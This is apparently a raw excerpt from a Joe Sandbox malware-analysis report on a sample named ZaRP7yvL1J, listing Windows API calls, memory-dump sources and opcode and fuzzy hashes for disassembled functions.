                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: bb839e1e78b942a831ee6bbd02dfa1de27606e6959715ef2772661888b5af7d2
                                                                                                            • Instruction ID: b28123531a7501e7d6f22323b795b83dd5c2959a0e0bbb8e6d5112587b2b66b6
                                                                                                            • Opcode Fuzzy Hash: bb839e1e78b942a831ee6bbd02dfa1de27606e6959715ef2772661888b5af7d2
                                                                                                            • Instruction Fuzzy Hash: 3841C0B1D00349DFDB14CFA9D984ADEBBF5BF48350F60856AE818AB210D775A881CF91
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 390E1E81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 244c238a51b2c35f4ec969abe37f267ec2ed1b602ab8addd5942d5e6f2ada4b2
                                                                                                            • Instruction ID: bf4d78bd0e1243f4696c92911d549b89f6b0aef746a289bc51cf8e7445de6eea
                                                                                                            • Opcode Fuzzy Hash: 244c238a51b2c35f4ec969abe37f267ec2ed1b602ab8addd5942d5e6f2ada4b2
                                                                                                            • Instruction Fuzzy Hash: CA41E4B9A00745CFDB54CF99C844A9AFBF5FB88314F24C899E519AB321D774A841CFA0
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 390E0C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 0fdf610b4b8c4201b47b181aa1ee909e2296f4a569ba26c2b1b98b09e5806e5d
                                                                                                            • Instruction ID: d2168b597a8c0c6ea29ccd7d834fa978785e0463c3c769f6d2f2b5ff82c787dc
                                                                                                            • Opcode Fuzzy Hash: 0fdf610b4b8c4201b47b181aa1ee909e2296f4a569ba26c2b1b98b09e5806e5d
                                                                                                            • Instruction Fuzzy Hash: 2321E4B5D002599FDB10CFA9D584ADEBFF4EB48320F14846AE959A7350C374A940CFA5
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 390E0C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: c369797571041df87996feff076f5ae042d44aa9830fe8824e0f64c714cdf1fc
                                                                                                            • Instruction ID: 0d2656d3a971c28680ac854311e8e86f72f9f2644444d9ec60ef20a1f64001e0
                                                                                                            • Opcode Fuzzy Hash: c369797571041df87996feff076f5ae042d44aa9830fe8824e0f64c714cdf1fc
                                                                                                            • Instruction Fuzzy Hash: 9721C2B5D00259AFDB10CFAAD984ADEBFF4EB48320F14845AE958A7350D374A940CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: 85b01fe947921a440f4b413960ffa2e605bcac427484c36a3f6f95c18711d189
                                                                                                            • Instruction ID: 46c8db1db8553407fc3406406522dfad6aaab753cca5a0816a1642e39e228e3e
                                                                                                            • Opcode Fuzzy Hash: 85b01fe947921a440f4b413960ffa2e605bcac427484c36a3f6f95c18711d189
                                                                                                            • Instruction Fuzzy Hash: A61125B5800349DFDB20DF99D444BDEBFF8EB58320F10845AE558A7250C375A980CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 390ED445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 76e82b09f4b82fc8be63e0981462fec083f73722292dd7426ad8b0c626f3144a
                                                                                                            • Instruction ID: 324c025fd4c5a0f75f7dfa947f524c0e27a3bb881f05ee2eb7a64896f26cdcf9
                                                                                                            • Opcode Fuzzy Hash: 76e82b09f4b82fc8be63e0981462fec083f73722292dd7426ad8b0c626f3144a
                                                                                                            • Instruction Fuzzy Hash: F11125B1D00648CFDB20CFA9D544BDEBBF4EB49320F10885AD158A7210C375A584CFA1
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 390ED445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: c1fc477a0357d8f21d402f8c66859409f8e053473501067ef23647be5839c896
                                                                                                            • Instruction ID: 04cdbcc887033d92f9c1457b77d7e00aa78d56e1d17de607e29912476e76a140
                                                                                                            • Opcode Fuzzy Hash: c1fc477a0357d8f21d402f8c66859409f8e053473501067ef23647be5839c896
                                                                                                            • Instruction Fuzzy Hash: 8B1142B1D00748CFCB20CFAAD544BDEBBF4EB48324F20885AD528A7210C774A980CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 0d475647c13e3414a5b2ef8b88ec875e9cafecf4d0a7fd84b295a047d52c29d5
                                                                                                            • Instruction ID: f7aaeab795abe5598fd195d64e6bb4c6a9a0785c4c635477e8319c1fc9fb60fd
                                                                                                            • Opcode Fuzzy Hash: 0d475647c13e3414a5b2ef8b88ec875e9cafecf4d0a7fd84b295a047d52c29d5
                                                                                                            • Instruction Fuzzy Hash: 7611FEB5D0064ACFCB10CF9AD684BCEFBF0EB48324F10846AD459A7250C378A584CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: 09da3e56f9d9f5dd2942b5294e723b0d810fd5325fecef072251fa3a50d44b19
                                                                                                            • Instruction ID: df6b71fef18564fbc576dd54bf43ca21164b4fa6ed7e9a4e6dadae2c7795133d
                                                                                                            • Opcode Fuzzy Hash: 09da3e56f9d9f5dd2942b5294e723b0d810fd5325fecef072251fa3a50d44b19
                                                                                                            • Instruction Fuzzy Hash: 841100B5800349DFCB10DF9AD984BDEBBF8EB48320F10845AE958A7250C375A980CFA1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 76aea5d2e9cb6cdea9cdc0966d3343820059f57e5053e8ee51d8b0fcb55cf9da
                                                                                                            • Instruction ID: 20a1ce49a01e5e06df7c2000a8cc3f7ab26f46a0e155f9535a55e561855bf6b1
                                                                                                            • Opcode Fuzzy Hash: 76aea5d2e9cb6cdea9cdc0966d3343820059f57e5053e8ee51d8b0fcb55cf9da
                                                                                                            • Instruction Fuzzy Hash: 9F11DDB5D00649CFCB10CFAAD984BDEFBF4EB48324F10846AD459A7610D378A584CFA9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q
                                                                                                            • API String ID: 0-2625958711
                                                                                                            • Opcode ID: 30a16f06ab31a701d679d5dd1233f10030d4b242974a271a37e78b70b8816502
                                                                                                            • Instruction ID: 0b34bd7c58ba040d7fcca358649f77decbd0a9497d3163c79ac85a3123f72a24
                                                                                                            • Opcode Fuzzy Hash: 30a16f06ab31a701d679d5dd1233f10030d4b242974a271a37e78b70b8816502
                                                                                                            • Instruction Fuzzy Hash: 8DA1DC74A00209CFCF04DFA8D994AADBBB2FF89705B104529E509BB765DB34AD46CF84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q
                                                                                                            • API String ID: 0-2625958711
                                                                                                            • Opcode ID: 46433e3a09a3971121de9968b29129e39494d275760283d27f8195262e4728bb
                                                                                                            • Instruction ID: 3be583f5ccfedc2a2fe4170325590c4a5bd5ad970036ff8047b748786e2bde0c
                                                                                                            • Opcode Fuzzy Hash: 46433e3a09a3971121de9968b29129e39494d275760283d27f8195262e4728bb
                                                                                                            • Instruction Fuzzy Hash: 3FA1CB74A00209CFCF04DFA8D984AADBBB2FF89705B104529E509BB765DB34AD46CF84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q
                                                                                                            • API String ID: 0-74704288
                                                                                                            • Opcode ID: fd7014fd67f2f4fd7d74c553e873fc2c44e25ac0289d08c5bcb24bcb0d4c6ff5
                                                                                                            • Instruction ID: 356abf9be692d563250872cb1e7b673d1c349a8a45183643d050b5220b0f8a16
                                                                                                            • Opcode Fuzzy Hash: fd7014fd67f2f4fd7d74c553e873fc2c44e25ac0289d08c5bcb24bcb0d4c6ff5
                                                                                                            • Instruction Fuzzy Hash: 8A41C331B042048FCB159F79D854AAE7BF6BBC8310F24446AE906D77A1DF359D01CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5529e549099301364ddd9b59033f2958e023fce9aca0850b046104ac8129242a
                                                                                                            • Instruction ID: 4dd133d2f2ff6d83a0368288c64c898dd831236c063b5cd9e6bf813a2d0b5e26
                                                                                                            • Opcode Fuzzy Hash: 5529e549099301364ddd9b59033f2958e023fce9aca0850b046104ac8129242a
                                                                                                            • Instruction Fuzzy Hash: E8E1F534A00218DFDB25DF64C954BADBBB2FB89700F1085AAD90A77364CB359E82DF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b6784123efbfd8e28acbb458e975930351d92ae1da043ddf64eb762b39962325
                                                                                                            • Instruction ID: 0962242b088ad9163a794d68bada77ad2e37f887b18be8edc71f8a921c5c0976
                                                                                                            • Opcode Fuzzy Hash: b6784123efbfd8e28acbb458e975930351d92ae1da043ddf64eb762b39962325
                                                                                                            • Instruction Fuzzy Hash: A1E10534A00218DFDB25DF64C954BADBBB2FB89700F1085AAD90A77364CB359E82DF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c87ca53b00eb1cf346242913a1f3374135c1def656477394cd2b49cf9fcde76d
                                                                                                            • Instruction ID: 6ff3cea548502efa8ecaf58a7233037319b31888c091918046b847188345c9b7
                                                                                                            • Opcode Fuzzy Hash: c87ca53b00eb1cf346242913a1f3374135c1def656477394cd2b49cf9fcde76d
                                                                                                            • Instruction Fuzzy Hash: 72810771A057059FC714CF2CC8849AABBB6FF84320B55C667E85997392DB31E812CBB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4fa7664fff7dd868d5f0aa788d4b9057e8b3885edd506e1e04a184c7d8b3a22d
                                                                                                            • Instruction ID: bf691da0fc7dc1cec6f6ec0087d83d15650d4921e2f099158df337e96ac62253
                                                                                                            • Opcode Fuzzy Hash: 4fa7664fff7dd868d5f0aa788d4b9057e8b3885edd506e1e04a184c7d8b3a22d
                                                                                                            • Instruction Fuzzy Hash: 047119347003058FDB54DF28C894A6E7BE6AF59700F1944A6E806CB3B1DB76EC41DBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ca6dc845dd9a745b320eec45944d10bcc0dc7edb7a78ef1964b05eb1a554b044
                                                                                                            • Instruction ID: 04bcf3af868214b3a892a140d264cb135067cbc2561fed1f8e948fb9943452da
                                                                                                            • Opcode Fuzzy Hash: ca6dc845dd9a745b320eec45944d10bcc0dc7edb7a78ef1964b05eb1a554b044
                                                                                                            • Instruction Fuzzy Hash: 66716F35604755CFC715CF68C898A6ABBB1FF45311B57849AE8199B3A2CB31EC40CB61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 239a2aca9d844530ec2d7e1bc920457c2ad732902891100c0808d03d4fb542f7
                                                                                                            • Instruction ID: 7629a820e0bbe5a9967ac685877265fdd3418f2bbe076809cf4cd495b3d362ea
                                                                                                            • Opcode Fuzzy Hash: 239a2aca9d844530ec2d7e1bc920457c2ad732902891100c0808d03d4fb542f7
                                                                                                            • Instruction Fuzzy Hash: BC71E575B002199FDB05EFB5C9585ADBBB2FF88315F20852AE406AB360DB389942CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7cabf63486d8229590c5733f1d8449d5c49073aab2be6f39b1ee3960eefe4c62
                                                                                                            • Instruction ID: 984b6f8f323a94ae70c1113ac862b49235fc888c30dcc0ebe180b6a9fb21ba13
                                                                                                            • Opcode Fuzzy Hash: 7cabf63486d8229590c5733f1d8449d5c49073aab2be6f39b1ee3960eefe4c62
                                                                                                            • Instruction Fuzzy Hash: 8051D074D01219DFDB14DFA5C954AADBBB2FF88304F208529E809BB354DB359A8ACF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b77505e8e24166ad98d27bd615992d3357e7e598ae914a4a63eb7d127ef7d107
                                                                                                            • Instruction ID: 3892b2abe574fcd341ba1f777568f5120764e4b9378257b681ed227a12211862
                                                                                                            • Opcode Fuzzy Hash: b77505e8e24166ad98d27bd615992d3357e7e598ae914a4a63eb7d127ef7d107
                                                                                                            • Instruction Fuzzy Hash: 16517474E00218DFDB54DFA9C990ADDBBB2FF89300F20816AD819AB365DB319946CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6f828c137081d1f552dd0a42c4a1e89d3b8f1c6a90dd8269dc47aeb96fa82ae
                                                                                                            • Instruction ID: 5a1df56480ae2e9506efa80409784a5b2956d17ec4b5dce0b6dac2ce7061ab6a
                                                                                                            • Opcode Fuzzy Hash: d6f828c137081d1f552dd0a42c4a1e89d3b8f1c6a90dd8269dc47aeb96fa82ae
                                                                                                            • Instruction Fuzzy Hash: B651F874915396DFDB12CFB0E0983DDBFB2AB16200F945A9AC540BB315C279458ACF72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e9aa6b1b5d022e6ead6c194c161ba04f879dd86529f4dafc3f9a7ae8afe1992
                                                                                                            • Instruction ID: 3cae02c581e5c4afca4d12d3dc868206a26cbd1102e4bd1ad5b24c491b2392ad
                                                                                                            • Opcode Fuzzy Hash: 4e9aa6b1b5d022e6ead6c194c161ba04f879dd86529f4dafc3f9a7ae8afe1992
                                                                                                            • Instruction Fuzzy Hash: B2519F74E01308DFCB48DFA9D58499DBBB2FF89314B209069E809BB365DB35A942CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 394764bce6251dd6310188c47fe62552693f3a1e5b04e8b0f05e03912c378d05
                                                                                                            • Instruction ID: 3c717ea5a43aa06cfaca0114ad05084291d627605b49ef7549f6c2972b5e5d5c
                                                                                                            • Opcode Fuzzy Hash: 394764bce6251dd6310188c47fe62552693f3a1e5b04e8b0f05e03912c378d05
                                                                                                            • Instruction Fuzzy Hash: 7341B031A04349DFCF25CFA5C844AEDBBB2AF89310F148156E805AB3A2D334E911CB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0fb16884590d4974acf537444db3a39d77ec5f837937af7bd09ad62e4a5310eb
                                                                                                            • Instruction ID: 9a9e9aeb1388c7314840a6ef142af52433239e313cd509d67a90991133d5ddcb
                                                                                                            • Opcode Fuzzy Hash: 0fb16884590d4974acf537444db3a39d77ec5f837937af7bd09ad62e4a5310eb
                                                                                                            • Instruction Fuzzy Hash: 7E31B231304249EFCF059F64D854ABE3BA2EB89300F148025FA169B755CB39DE21EFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81c6595ecd8d4d4558dcba6d700c01674671cd7c8f607cc887c3bcb8f25252ba
                                                                                                            • Instruction ID: 9b69a13352826c35ab92ec602fef582514b08b9f9b5a1941379f901b2e136468
                                                                                                            • Opcode Fuzzy Hash: 81c6595ecd8d4d4558dcba6d700c01674671cd7c8f607cc887c3bcb8f25252ba
                                                                                                            • Instruction Fuzzy Hash: 4E310B75A083808FD715CB79C4906EEBFF39F89300F14459AD492DB391DA399805CB71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d41655787fdf420271c4080530685f7828ae1292eddb9a2af6937cd83a200e5
                                                                                                            • Instruction ID: 5f16aebfb97eaa976b5de2607d34381c367725b08c99d40e588c850855ecc4a0
                                                                                                            • Opcode Fuzzy Hash: 3d41655787fdf420271c4080530685f7828ae1292eddb9a2af6937cd83a200e5
                                                                                                            • Instruction Fuzzy Hash: 99310631C10A09DFDB10EFB8D8586EDBBB1FF4A312F519915E449B7220EB34564ACB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad1a07b00f9bf4a49635218bb7f3a1f75189c711e3078fb45408a662380750f1
                                                                                                            • Instruction ID: 3b842bf16ca94a4f3b412092d63ef5919b638a4cc521e93fe7744ff197c83473
                                                                                                            • Opcode Fuzzy Hash: ad1a07b00f9bf4a49635218bb7f3a1f75189c711e3078fb45408a662380750f1
                                                                                                            • Instruction Fuzzy Hash: FE21D3313083058BDB2557399894A3D6AD7AFD4759718803BD40ACB7E5FA3ACC03E7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 116038747be18468d29a577cce9b06329e8f206e382709f10c404ee084ff8c3c
                                                                                                            • Instruction ID: c91d6dbc80ea18e831525a1a584ecad59795e7a8256a142c8176e7b49b6cd755
                                                                                                            • Opcode Fuzzy Hash: 116038747be18468d29a577cce9b06329e8f206e382709f10c404ee084ff8c3c
                                                                                                            • Instruction Fuzzy Hash: 5D316DB4A0534ACFCB11CFA8C284AADBFF0EF0A314F1045EAD455AB362D7349A45DB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5f12662f8249b03b532041d60ba4d8df09b3be778616ff75d98dcbe83d1255ab
                                                                                                            • Instruction ID: 3359278f1489062dfd0783501692d99c093609a36a678d8151fa8de58e192798
                                                                                                            • Opcode Fuzzy Hash: 5f12662f8249b03b532041d60ba4d8df09b3be778616ff75d98dcbe83d1255ab
                                                                                                            • Instruction Fuzzy Hash: 3E31A375B002058BDB28CB79C5906AFBBF79F88740F14862DD422AB390DB39D805CB71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5aaddf3042ddb694676fcf837f1ba4ee81f1dfd6902c4a22e7905fff514e3d33
                                                                                                            • Instruction ID: bfcd197ba2fe3b0f89ac83bfce617d20feabc22f2f5315e7a9222eeb59da4759
                                                                                                            • Opcode Fuzzy Hash: 5aaddf3042ddb694676fcf837f1ba4ee81f1dfd6902c4a22e7905fff514e3d33
                                                                                                            • Instruction Fuzzy Hash: 4D21C13130830487EB251725C89473E2AD7AFC4758B14843AD40ACBBD4EA3BCC42E7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5cb8fcdacfb4e3476410bd409fa2381944968fecb5999798344f27eac20c0e99
